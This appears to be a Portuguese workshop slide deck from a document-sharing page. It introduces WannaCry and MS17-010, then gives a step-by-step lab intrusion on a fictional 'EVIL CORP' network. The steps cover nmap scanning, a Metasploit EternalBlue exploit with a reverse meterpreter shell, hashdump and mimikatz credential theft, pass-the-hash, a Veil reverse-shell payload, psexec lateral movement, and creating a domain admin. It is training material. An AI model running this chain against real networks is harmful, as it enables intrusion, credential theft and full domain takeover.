• Nenhum resultado encontrado

NSA HACKING. Jonathan Messias Washington Silas

N/A
N/A
Protected

Academic year: 2021

Share "NSA HACKING. Jonathan Messias Washington Silas"

Copied!
16
0
0

Texto

(1)

NSA HACKING

Washington Silas

washington.souza@gemina.io Jonathan Messias

(2)

Introdução

O que é o WannaCry?

O ransomware WannaCry visa redes que usam SMBv1, um protocolo que ajuda PCs a se comunicarem com impressoras e outros dispositivos conectados na rede. Essa versão, que vem de 2003, deixa computadores expostos a hackers, uma vulnerabilidade chamada MS17-010. A Microsoft lançou um patch para corrigi-la em março de 2017 para as versões do Windows que ainda têm suporte, mas qualquer pessoa que não tenha instalado o patch tornou-se um alvo fácil para os hackers que criaram o WannaCry.

Quais são os alvos do WannaCry?

Durante um grande surto de ransomware em maio de 2017, Rússia, China, Ucrânia, Taiwan, Índia e Brasil foram os países mais afetados. O WannaCry afetou tanto pessoas quanto organizações governamentais, hospitais, universidades, empresas ferroviárias, firmas de tecnologia e operadoras de telecomunicações em mais de 150 países. O National Health Service do Reino Unido, Deutsche Bahn, a empresa espanhola Telefónica, FedEx, Hitachi e Renault estavam entre as vítimas.

(3)

Introdução

De onde vem o WannaCry?

Especialistas notaram que o ransomware WannaCry se comporta como um worm, usando dois métodos de ataque encontrados no arsenal que vazou da NSA (ETERNALBLUE e DOUBLEPULSAR). Eles também

encontraram evidência que liga o surto de ransomware ao Grupo Lazarus da Coreia do Norte.

Em 2014, os hackers (conhecidos por usar bitcoin em suas operações) apagaram mais de um terabyte de dados do banco de dados da Sony Pictures. Eles também criaram um backdoor maligno em 2015 e se envolveram em um ataque cibernético de US$ 81 milhões no Banco Central de Bangladesh em 2016.

(4)

Objetivo

[*] Nesta oficina você vai ter os primeiros contatos com Hacking sendo um espião da NSA com a missão de invadir o computador de um executivo da empresa EVIL CORP, e através dessa invasão chegar até o

servidor principal e controlar toda a empresa.

[*] Este material está dividido em 3 partes, sendo elas:

PARTE 1 - Comprometer o computador da recepcionista da EVIL CORP, coletar a hash do administrador

local e pegar a credencial em texto puro de um usuário de domínio.

PARTE 2 - Fazer movimentação lateral para o computador do CEO da EVIL CORP e pegar as credenciais em

texto puro de um administrador de domínio.

PARTE 3 - Conseguir fazer acesso remoto no servidor AD, criar um usuário com privilégios administrativos e

(5)
(6)
(7)

01. Logar no Kali-NSA com o usuário root e a senha H@ck3rNS@.

02. Abra um terminal e rode o nmap em toda a rede para procurar algum alvo vulnerável ao WannaCry.

nmap -v -n -Pn -sS -sV --script=smb-vuln-ms17-010.nse 192.168.15.0/24 -p 445

Você deverá ver o retorno do nmap do seu alvo vulnerável como a imagem a seguir:

Fase 01 - Reconhecimento

03. Verifique a arquitetura do Sistema Operacional do alvo, para saber qual payload usar na exploração.

(8)

01. Acesse o Metasploit, framework de exploração utilizado pela NSA com o objetivo de comprometer os

seus alvos.

msfconsole

02. Vamos usar o exploit ETERNALBLUE para fazer o ataque, o mesmo usado pelo WannaCry, mas no lugar

de inserir um ransomware vamos obter controle do alvo.

use exploit/windows/smb/eternalblue_doublepulsar

03. Veja as informações que o exploit necessita para a exploração.

show options

04. Fazer a configuração do exploit.

set RHOST <IP DO ALVO> set PROCESSINJECT lsass.exe set TARGETARCHITECTURE x64

set WINEPATH /var/lib/veil/wine/drive_c/

(9)

05. Selecionar um payload de shell reverso e configure.

set PAYLOAD windows/x64/meterpreter/reverse_https set LHOST <IP KALI>

set LPORT 443

Fase 02 - Preparando o Armamento

(10)

01. Executar o exploit.

exploit

02. Migrar para o processo lsass.

migrate -N lsass.exe getsystem

03. Coletar informações da vitima.

sysinfo

04. Extrair hashs dos usuários.

hashdump

05. Extrair credenciais dos usuários usando o mimikatz.

load kiwi creds_all

Fase 03 - Exploração

Exploração realizada com sucesso:

(11)
(12)

01. Busque máquinas na rede que você possa se autenticar com a hash capturada.

cme smb 192.168.15.0/24 -u administrator -H <HASH> --local-auth

02. Gere um payload em GO de shell reverso no veil.

veil use 1 use 15

set LHOST <IP KALI> set LPORT 4444

03. Verifique se as informações estão corretas depois gere o payload.

options generate

Fase 01 - Movimentação Lateral

[*] De um nome de sua preferência para o payload.

(13)

03. Ative o listening no metasploit.

use multi/handler

set PAYLOAD windows/meterpreter/reverse_https set LHOST <SEU IP>

set LPORT 4444 exploit -j -z

04. Faça movimentação lateral para a máquina do CEO usando o psexec.py e o payload gerado por você.

cd /root/Tools

python psexec.py -hashes <HASH> administrator@<IP ALVO> -c /var/lib/veil/output/compiled/payload.exe

Fase 01 - Movimentação Lateral

(14)

05. Faça o procedimento de migração de processo e captura de senhas novamente. sessions X migrate -N winlogon.exe getsystem load kiwi creds_all

Fase 01 - Movimentação Lateral

Após migrar de processo e carregar o módulo do mimikatz, você vai ver uma tela como a imagem ao lado.

(15)
(16)

01. Acesse o Servidor AD com o usuário capturado na máquina da recepcionista.

rdesktop <IP SERVIDOR> -d <DOMINIO> -u <USUARIO>

02. Coloque a senha e obtenha acesso ao servidor.

03. Siga esses passos para criar um usuário com acesso total a EVIL CORP.

Start -> Windows Administrative Tools -> Active Directory Users and Computers

04. Coloque o usuário e senha capturados na máquina do CEO.

05. Clique no nome do domínio, em seguida clique com o botão direito em Domain Controllers, New, User.

Fase 01 - Conquistar a EVIL CORP

PARABÉNS, VOCÊ DOMINOU TODA A REDE DA EVIL CORP!

AGORA VOCÊ É UM ESPIÃO DA NSA!

Referências

Documentos relacionados

A cana-de-açúcar é amplamente utilizada na alimentação de ruminantes, sobretudo pela supereminente disponibilidade de subprodutos como a sacharina, bagaço in

O grupo de produtos dominante, ao longo dos últimos quatro anos e primeiros cinco meses de 2018 nas exportações portuguesas de mercadorias para Macau, foi “Agroalimentares”,

Com capacidade para 3.500 folhas, este dispositivo de finalização pode empilhar os seus documentos ou passá- los para qualquer um dos finalizadores inline disponíveis no

O vereador Anderson pede aparte e comenta sua preocupaçao com relação ao PPE, pois segundo ele os projetos aprovados pela camara o Prefeito Laercio não cumpre, e

A espectrofotometria é uma técnica quantitativa e qualitativa, a qual se A espectrofotometria é uma técnica quantitativa e qualitativa, a qual se baseia no fato de que uma

Na apresentação dos dados estatísticos, ficou demonstrada à todos os participantes a dimensão da pesquisa, abrangendo o setor produtivo como um todo, enfocando a produção

É perceptível, desta forma, o constante aumento do aprofundamento dos personagens: os “príncipes” têm agora não só nome e falas, mas personalidades bem desenvolvidas,

Deste modo, o adequado zoneamento e sua observância são fundamentais para a conciliação da preservação ou conservação de espécies, hábitats e paisagens dentre outras e